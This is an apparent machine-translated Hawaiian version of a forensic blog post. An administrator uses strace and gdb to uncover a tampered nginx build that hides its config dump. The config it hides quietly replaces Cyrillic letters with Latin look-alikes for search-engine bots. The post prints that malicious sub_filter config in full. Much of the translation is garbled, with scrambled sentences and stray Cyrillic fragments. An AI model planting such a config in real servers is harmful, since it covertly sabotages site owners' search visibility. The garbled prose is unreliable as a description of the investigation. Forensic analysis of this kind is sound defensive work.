Ua hana ʻia kahi moʻolelo ʻoluʻolu ʻole i kekahi aʻu i ʻike ai. Akā, ʻoiai he mea ʻoluʻolu ʻole ia no Mikhail, ua like nō ia me ka mea hoihoi iaʻu.
Pono wau e ʻōlelo he kanaka maikaʻi loa koʻu hoaaloha UNIX- mea hoʻohana: hiki ke hoʻokomo i ka ʻōnaehana iā ia iho mysql, LIKE a hana i nā hoʻonohonoho maʻalahi loa nginx.
A he ʻumikūmālua kāna mau pūnaewele i hoʻolaʻa ʻia no nā mea hana kūkulu hale.
ʻO kekahi pūnaewele i hoʻolaʻa ʻia no nā chainsaw aia ma ke poʻo o nā kūlana ʻenekini huli. He pūnaewele loiloi ʻaʻole kālepa kēia pūnaewele, akā ua luhi kekahi iā ia a ua hoʻomaka e hoʻouka iā ia. DDoS, a laila ka ikaika ʻino, a laila kākau lākou i nā ʻōlelo pelapela a hoʻouna i nā hana ʻino i ka hale hoʻokipa a me RKN.
Ua mālie koke nā mea a pau, a ua lilo kēia mālie i mea maikaʻi ʻole, a ua hoʻomaka ka pūnaewele e haʻalele mālie i nā laina kiʻekiʻe o nā hopena hulina.
He ʻōlelo ia, a laila ka moʻolelo a ka luna hoʻomalu ponoʻī.
Ua kokoke mai ka manawa e hiamoe ai i ke kani ʻana o kaʻu kelepona: "E Sanya, hiki iā ʻoe ke nānā i kaʻu kikowaena? Manaʻo wau ua hacked ʻia au. ʻAʻole hiki iaʻu ke hōʻoia, akā ua ʻike au i kēia no ʻekolu pule i kēia manawa. Malia paha ua hiki i ka manawa no kekahi lāʻau lapaʻau no koʻu paranoia?"
ʻO ka mea i ukali ʻia he kūkākūkā hapalua hola i hiki ke hōʻuluʻulu ʻia penei:
- ua momona loa ke kahua no ka hacking;
- hiki i ka hacker ke loaʻa nā kuleana superuser;
- ua kuhikuhi ʻia ka hoʻouka kaua (inā ua hana ʻia) a ma kēia wahi ponoʻī;
- ua hoʻoponopono ʻia nā wahi pilikia a he mea pono wale nō e hoʻomaopopo inā he ʻoiaʻiʻo o ke komo ʻana;
- ʻAʻole hiki i ka hack ke hoʻopilikia i ke code a me nā waihona ʻikepili o ka pūnaewele.
E pili ana i ka manaʻo hope loa.
ʻO ka IP lehulehu wale nō o ka frontend ka mea i hōʻike ʻia i ke ao nei. ʻAʻohe kamaʻilio ma waena o nā backends a me ka frontend koe wale nō nā http(s), ʻokoʻa nā mea hoʻohana a me nā ʻōlelo huna, a ʻaʻole i hoʻololi ʻia nā kī. Ma nā helu wahi pilikino, ua pani ʻia nā awa āpau koe wale nō 80/443. ʻO nā IP lehulehu o ka backend wale nō i ʻike ʻia e nā mea hoʻohana ʻelua a Mikhail i hilinaʻi piha ai.
Ua hoʻokomo ʻia ma ka ʻaoʻao mua Debian 9 a i ka manawa e kāhea ʻia ai, ua hoʻokaʻawale ʻia ka ʻōnaehana mai ke ao nei e kahi pā ahi waho a ua hoʻōki ʻia.
"ʻAe, e hāʻawi mai iaʻu i ke komo ʻana," ua hoʻoholo wau e hoʻopanee i ka hiamoe no hoʻokahi hola. "E ʻike au me koʻu mau maka ponoʻī."
Mai kēia manawa aku:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
I ka ʻimi ʻana i kahi hack hiki
Ke hoʻomaka nei au i ke kikowaena, ma mua ʻano hoʻopakeleHoʻouka au i nā diski a kaʻahele ma waena o lākou. ʻae ʻianā lāʻau, mōʻaukala, nā moʻolelo ʻōnaehana, a pēlā aku, i nā manawa hiki, nānā wau i nā lā hana faila, ʻoiai ua maopopo iaʻu he "holoi" kahi hacker maʻamau i nā mea āpau, a ua "hehi" nui ʻo Misha i ka wā e ʻimi ana iā ia iho.
Ke hoʻomaka nei au ma ke ʻano maʻamau, ʻaʻole maopopo iaʻu ka mea e nānā ai, no laila ke aʻo nei au i nā hoʻonohonoho. ʻO koʻu makemake nui nginx no ka mea, ma ke ʻano laulā, ʻaʻohe mea ʻē aʻe ma ka ʻaoʻao mua koe wale nō.
He liʻiliʻi nā hoʻonohonoho, ua hoʻonohonoho maikaʻi ʻia i loko o nā faila he ʻumikūmālua, ke nānā wale nei au iā lākou pōpokiʻOm ma ka huli. Me he mea lā ua maʻemaʻe nā mea āpau, akā malia paha ua hala iaʻu kekahi mea. komo pū, e hana wau i kahi papa inoa piha:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
ʻAʻole maopopo iaʻu: "ʻAuhea ka papa inoa?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
Ua hoʻohui ʻia ka nīnau e pili ana i ka papa inoa e ka lua: "No ke aha i kahiko loa ai ka mana o nginx?"
Eia kekahi, manaʻo ka ʻōnaehana he mea hou loa ka mana i hoʻokomo ʻia:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
Ke kāhea aku nei au:
- E Mish, no ke aha ʻoe i hoʻākoakoa hou ai? nginx?
- E hoʻi mai ʻoe i kou noʻonoʻo, ʻaʻole maopopo iaʻu pehea e hana ai i kēia!
- ʻAe, e hele e hiamoe ...
Nginx Ua kūkulu hou ʻia, a ua hūnā ʻia ka hopena papa inoa "-T" no kekahi kumu. ʻAʻohe kānalua hou e pili ana i ka hack, no laila hiki iā mākou ke ʻae wale a (ʻoiai ua pani ʻo Misha i ke kikowaena me kahi mea hou) e noʻonoʻo ua hoʻoponopono ʻia ka pilikia.
A ʻoiaʻiʻo hoʻi, i ka wā i loaʻa ai i kekahi nā pono aaʻā, a laila he mea kūpono wale nō ke hana hoʻouka hou ʻana i ka ʻōnaehana, a he mea ʻole ka ʻimi ʻana i ka mea i hana ʻia ma laila, akā i kēia manawa ua lanakila ka hoihoi i ka hiamoe. Pehea lā e hiki ai iā kākou ke ʻike i ka mea a lākou i makemake ai e hūnā mai iā kākou?
E ho'āʻo kākou e hahai:
$ strace nginx -T
Ke nānā nei mākou i ke kaha, aia nā laina i nalowale e like me
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
No ka hoihoi, e hoʻohālikelike kākou i nā ʻike
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Manaʻo wau he ʻāpana ia o ke code /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
ua lawe ʻia i ke ʻano:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
ai ole ia,
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
ʻo ia ke kumu i hōʻike ʻole ʻia ai ka papa inoa no "-T".
Akā pehea e hiki ai iā mākou ke ʻike i kā mākou hoʻonohonoho?
Inā pololei koʻu manaʻo a aia wale nō ka pilikia ma ke ʻano loli ngx_dump_config e ho'āʻo kākou e hoʻokomo iā ia me ka hoʻohana ʻana gdb, mahalo i ke kī —me-cc-opt -g aia a ke manaʻolana nei mākou e hoʻonui ʻia -O2 ʻAʻole ia e hōʻeha iā mākou. Eia naʻe, ʻoiai ʻaʻole au i ʻike pehea ngx_dump_config hiki ke hana ʻia i loko hihia 'T':, ʻaʻole mākou e kapa i kēia poloka, akā e hoʻokomo iā ia me ka hoʻohana ʻana hihia 't':
No ke aha e hiki ai iaʻu ke hoʻohana i ka '-t' a me ka '-T'?Ka hana ʻana i ka poloka inā(ngx_dump_config) hana ʻia i loko inā(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
ʻOiaʻiʻo, inā ua hoʻololi ʻia ke code ma kēia ʻāpana, ʻaʻole ma hihia 'T':, a laila ʻaʻole e holo pono kaʻu hana.
Hoʻāʻo nginx.confMa hope o ka hoʻoponopono mua ʻana i ka pilikia ma o ka ʻike, ua hoʻokumu ʻia he pono kahi hoʻonohonoho liʻiliʻi no ka hana ʻana o ka malware nginx ʻano:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
No ka pōkole, e hoʻohana mākou ia ma ka ʻatikala.
E hoʻomaka kākou i ka debugger
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
ʻO kēlā me kēia ʻanuʻu:
- hoʻonoho i kahi breakpoint i loko o ka hana main ()
- hoʻomaka mākou i ka papahana
- Hoʻololi mākou i ka waiwai o ka loli e hoʻoholo ai i ka hopena config ngx_dump_config=1
- hoʻomau/hoʻopau i ka papahana
E like me kā mākou e ʻike ai, ʻokoʻa ke ʻano maoli mai kā mākou. E unuhi kākou i ka ʻāpana parasitic mai ia mea:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
E nānā kākou i nā mea e hana nei ma ʻaneʻi ma ke ʻano.
Ke hoʻoholo ʻia nei Mea Hoʻohui Mea PiliʻO ka Yandex/Google kēia:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
Ua kāpae ʻia nā ʻaoʻao lawelawe wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
A no ka poʻe i hāʻule ma lalo o nā kūlana ʻelua i luna
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
i loko o ke kikokikona mana html-ke loli nei nā ʻaoʻao ʻO maluna o ʻo и ʻA maluna o he:
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
ʻAe, ʻo ka mea maʻalahi wale nō ia ʻaʻohe! = ʻaʻohe like me ʻo' != 'o':
No laila, loaʻa i nā robots ʻenekini huli nā ʻōpala i hoʻololi ʻia i hoʻokahe ʻia me nā huapalapala Latina ma kahi o ka kikokikona Cyrillic 100% maʻamau. he и ʻoʻAʻole hiki iaʻu ke kuhi pehea e pili ai kēia i ka SEO, akā, ʻaʻole paha e loaʻa ka hopena maikaʻi o ia hui pū ʻana o nā leka i nā hopena hulina.
He aha kaʻu e ʻōlelo ai, e nā kānaka me ka noʻonoʻo.
kūmole
Source: www.habr.com
